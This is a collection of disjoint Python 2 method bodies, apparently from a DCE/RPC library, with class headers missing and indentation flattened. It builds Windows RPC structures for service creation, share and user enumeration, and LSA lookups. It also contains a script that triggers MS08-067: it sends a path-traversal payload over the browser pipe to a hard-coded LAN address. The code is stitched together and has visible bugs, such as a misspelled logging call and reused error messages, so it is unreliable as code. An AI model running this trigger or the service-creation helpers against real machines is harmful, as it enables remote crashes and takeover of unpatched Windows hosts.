def __init__(self, data=None, machine_name='', database_name='', desired_access=0, is_unicode=True): Struct.__init__(self, data) if data is not None: pos = 0 self['MachineNamePtr'] = unpack('<L', data[pos:pos + 4]) pos += 4 self['MachineName'] = DCERPCString(data=data[pos:]) pos += len(self['MachineName'].pack()) self['DatabaseNamePtr'] = unpack('<L', data[pos:pos + 4]) pos += 4 self['DatabaseName'] = DCERPCString(data=data[pos:]) pos += len(self['DatabaseName'].pack()) self['DesiredAccess'] = unpack('<L', data[pos:pos + 4]) else: if len(machine_name): self['MachineName'] = DCERPCString( string=machine_name.encode('UTF-16LE')) self['MachineNamePtr'] = 0x20004 if len(database_name): self['DatabaseName'] = DCERPCString( string=database_name.encode('UTF-16LE')) self['DatabaseNamePtr'] = 0x20008 self['DesiredAccess'] = desired_access
def __init__(self, data=None, extradata=None): Struct.__init__(self, data) if data is not None: pos = self.calcsize() if self['Length'] == 0: self['Name'] = DCERPCString(string='') else: self['Name'] = DCERPCString(data=extradata)
def pack(self): if len(self['ServerName']): data = pack('<L', 0x20004) data += DCERPCString(string = self['ServerName']).pack() else: data = pack('<L', 0) # Null Ptr data += DCERPCString(string = self['NetName']).pack() data += pack('<L', self['Level']) return data
def pack(self): data =Struct.pack(self) for i in xrange(self['MaxCount']): data += pack('<L', 0x20010+i*4) data += pack('<L', self.shares[i]['type']) data += pack('<L', 0x20100+i*4) for i in xrange(self['MaxCount']): data += DCERPCString(string=self.shares[i]['name'].encode('UTF-16LE'), is_unicode=True).pack() data += DCERPCString(string=self.shares[i]['comment'].encode('UTF-16LE'), is_unicode=True).pack() return data
def __init__(self, data=None, manager_handle='', service_name='', is_unicode=True): Struct.__init__(self, data) if data is not None: pos = 0 self['ManagerHandle'] = unpack('20s', data[pos:pos+20]) pos += 20 self['ServiceName'] = DCERPCString(data=data[pos:]) pos += len(self['ServiceName'].pack()) self['AccessMask'] = unpack('<L', data[pos:pos+4]) else: self['ManagerHandle'] = manager_handle self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))
def __init__(self, data=None, ShareArray=[]): Struct.__init__(self, data) self.shares = [] if data is not None: pos = self.calcsize() for i in xrange(self['MaxCount']): refptr = unpack('<L', data[pos:pos + 4])[0] pos += 4 stype = unpack('<L', data[pos:pos + 4])[0] pos += 4 self.shares.append({'type': stype}) refptr2 = unpack('<L', data[pos:pos + 4])[0] pos += 4 for i in xrange(self['MaxCount']): s = DCERPCString(data=data[pos:]) self.shares[i]['name'] = s.get_string().decode( 'UTF-16LE').encode('ascii')[:-1] pos += len(s.pack()) s2 = DCERPCString(data=data[pos:]) self.shares[i]['comment'] = s2.get_string().decode( 'UTF-16LE').encode('ascii')[:-1] pos += len(s2.pack()) else: self.shares = ShareArray self['MaxCount'] = len(self.shares)
def __init__(self, data=None, service_handle='', args=[], is_unicode=True): Struct.__init__(self, data) if not data: self['ServiceHandle'] = service_handle self['argc'] = len(args) self['argv'] = [ DCERPCString(string=arg.encode('ASCII'), is_unicode=False) for arg in args ] else: pos = 28 self['argc'] = len(args) self['argv'] = [] for i in xrange(self['argc']): arg = DCERPCString(data=data[pos:]) self['argv'].append(arg) pos += len(arg.pack())
def pack(self): # PolicyHandle data = self['PolicyHandle'] # NamesArray names = self['NamesArray'] data += pack('<L', self['Count']) data += pack('<L', self['Count']) size = 0 for i in xrange(len(names)): size = len(names[i]) data += pack('<H', size) data += pack('<H', size) data += pack('<L', 2 + i) for i in xrange(len(names)): data += DCERPCString(string=names[i], is_unicode=True).pack(force_null_byte=0) # Padding is mandatory if (len(data) % 4) != 0: data += '\0' * (4 - (len(data) % 4)) # SidsArray data += LsaTransSidArray().pack() # Level data += pack('<H', self['LsaLookupLevel']) data += pack('<H', 0) # padding # Count data += pack('<L', 0) return data
def pack(self): data = pack('<L', 0x20004) data += DCERPCString(string=self['SystemName']).pack() data += self['ObjectAttributes'] data += Struct.pack(self) return data
def __init__(self, data=None, UsernameArray=[]): Struct.__init__(self, data) self.usernames = [] if data is not None: Struct.__init__(self, data) pos = self.calcsize() for i in xrange(self['MaxCount']): refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 for i in xrange(self['MaxCount']): s = DCERPCString(data=data[pos:]) self.usernames.append(s.get_string().decode('UTF-16LE').encode('ascii')[:-1]) pos += len(s.pack()) self['UsernameArray'] = ''.join(UsernameArray) else: self.usernames = UsernameArray self['MaxCount'] = len(self.usernames) self['UsernameArray'] = ''.join(UsernameArray)
def pack(self): if len(self['ServerName']): data = pack('<L', 0x20004) data += DCERPCString(string=self['ServerName']).pack() else: data = pack('<L', 0) # Null Ptr data += self['UserInfo'].pack() data += pack('<L', self['PrefMaxLen']) data += self['ResumeHandle'].pack() return data
def __init__(self, data=None, manager_handle='\x00'*20, service_name='', binary_pathname='', display_name='', start_type=SVCCTL_SERVICE_DEMAND_START, is_unicode=True): Struct.__init__(self, data) if data is not None: pos = 0 self['ManagerHandle'] = data[pos:pos+20] pos += 20 self['ServiceName'] = DCERPCString(data=data[pos:]) pos += len(self['ServiceName'].pack()) self['DisplayNamePtr'] = data[pos:pos+4] self['DisplayName'] = DCERPCString(data=data[pos:]) pos += len(self['DisplayName'].pack()) self['AccessMask'] = data[pos:pos+4] pos += 4 self['ServiceType'] = data[pos:pos+4] pos += 4 self['ServiceStartType'] = data[pos:pos+4] pos += 4 self['ServiceErrorControl'] = data[pos:pos+4] pos += 4 self['BinaryPathName'] = DCERPCString(data=data[pos:]) pos += len(self['BinaryPathName'].pack()) self['LoadOrderGroupPtr'] = data[pos:pos+4] pos += 4 self['TagId'] = data[pos:pos+4] pos += 4 self['DependenciesPtr'] = data[pos:pos+4] if self['DependenciesPtr']: logging.eror('SVCCTL_ERROR: DependenciesPtr != 0') return pos += 4 self['DependSize'] = data[pos:pos+4] pos += 4 self['ServiceStartNamePtr'] = data[pos:pos+4] if self['ServiceStartNamePtr']: logging.eror('SVCCTL_ERROR: DependenciesPtr != 0') return pos += 4 self['PasswordPtr'] = data[pos:pos+4] if self['PasswordPtr']: logging.eror('SVCCTL_ERROR: DependenciesPtr != 0') return pos += 4 self['PasswordSize'] = data[pos:pos+4] else: self['ManagerHandle'] = manager_handle self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE')) self['BinaryPathName'] = DCERPCString(string=binary_pathname.encode('UTF-16LE')) if len(display_name): self['DisplayName'] = DCERPCString(string=display_name.encode('UTF-16LE')) self['DisplayNamePtr'] = 0x20004 else: self['DisplayNamePtr'] = 0 self['ServiceStartType'] = start_type
def __init__(self, data=None, Name='', Sid=''): Struct.__init__(self, data) if data is None: if Name is not None: self['NameLength'] = len(Name) self['NameSize'] = len(Name) self['NamePtr'] = 0x2000040 self['NameString'] = DCERPCString( string=Name.encode('UTF-16LE')) if Sid is not None: self['SidPtr'] = 0x2000050 self['Sid'] = DCERPCSid(Sid=Sid)
def __init__(self, data=None, Sids=[]): Struct.__init__(self, data) if data is not None: pos1 = self.calcsize() objsize = LsaTranslatedNameEx2().calcsize() pos2 = pos1 + objsize * self['Count'] self['Names'] = [] for i in xrange(self['Count']): Name = LsaTranslatedNameEx2(data=data[pos1:], extradata=data[pos2:]) self['Names'].append(Name) pos1 += Name.calcsize() name_str = Name.get_name()['Name'] if len(name_str): pos2 += len( DCERPCString(string=name_str, is_unicode=False).pack()) else: self['Count'] = len(Sids) self['NamesPtr'] = 0x020010 self['MaxCount'] = len(Sids) self['Sids'] = Sids
def __init__(self, data=None, ShareArray=[]): Struct.__init__(self, data) self.shares = [] if data is not None: pos = 0 refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 self['Type'] = unpack('<L', data[pos:pos+4])[0] pos += 4 refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 self['Permission'] = unpack('<L', data[pos:pos+4])[0] pos += 4 self['MaxUses'] = unpack('<L', data[pos:pos+4])[0] pos += 4 self['CurrentUses'] = unpack('<L', data[pos:pos+4])[0] pos += 4 refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 refptr = unpack('<L', data[pos:pos+4])[0] pos += 4 s = DCERPCString(data=data[pos:]) self['NetName'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1] pos += len(s.pack()) s = DCERPCString(data=data[pos:]) self['Comment'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1] pos += len(s.pack()) s = DCERPCString(data=data[pos:]) self['Path'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1] pos += len(s.pack()) s = DCERPCString(data=data[pos:]) self['Passwd'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1] pos += len(s.pack()) else: pass ## TODO
import sys from struct import pack if '.' not in sys.path: sys.path.append('.') from libs.newsmb.libdcerpc import DCERPC, DCERPCString print '***** Testing Windows 2000 Trigger for MS08-067 *****' path = u'A\\..\\..\\'.encode('UTF-16LE') mark = len(path) path += u'\0'.encode('UTF-16LE') data ='' data += pack('<L', 1) data += DCERPCString(string = u'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'.encode('UTF-16LE')).pack() data += '\0\0' data += DCERPCString(string = path).pack() data += '\0\0' data += pack('<L', 2) data += DCERPCString(string = u'\\'.encode('UTF-16LE')).pack() data += pack('<LL', 1, 1) dce = DCERPC(u'ncacn_np:192.168.2.107[\\browser]', getsock=None) #dce.max_dcefrag = 100 dce.bind(u'4b324fc8-1670-01d3-1278-5a47bf6ee188', u'3.0') #, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.call(0x1f, data, response=True) print dce.reassembled_data.encode('hex')
def unpack_name(self, data): self['NameString'] = DCERPCString(data=data)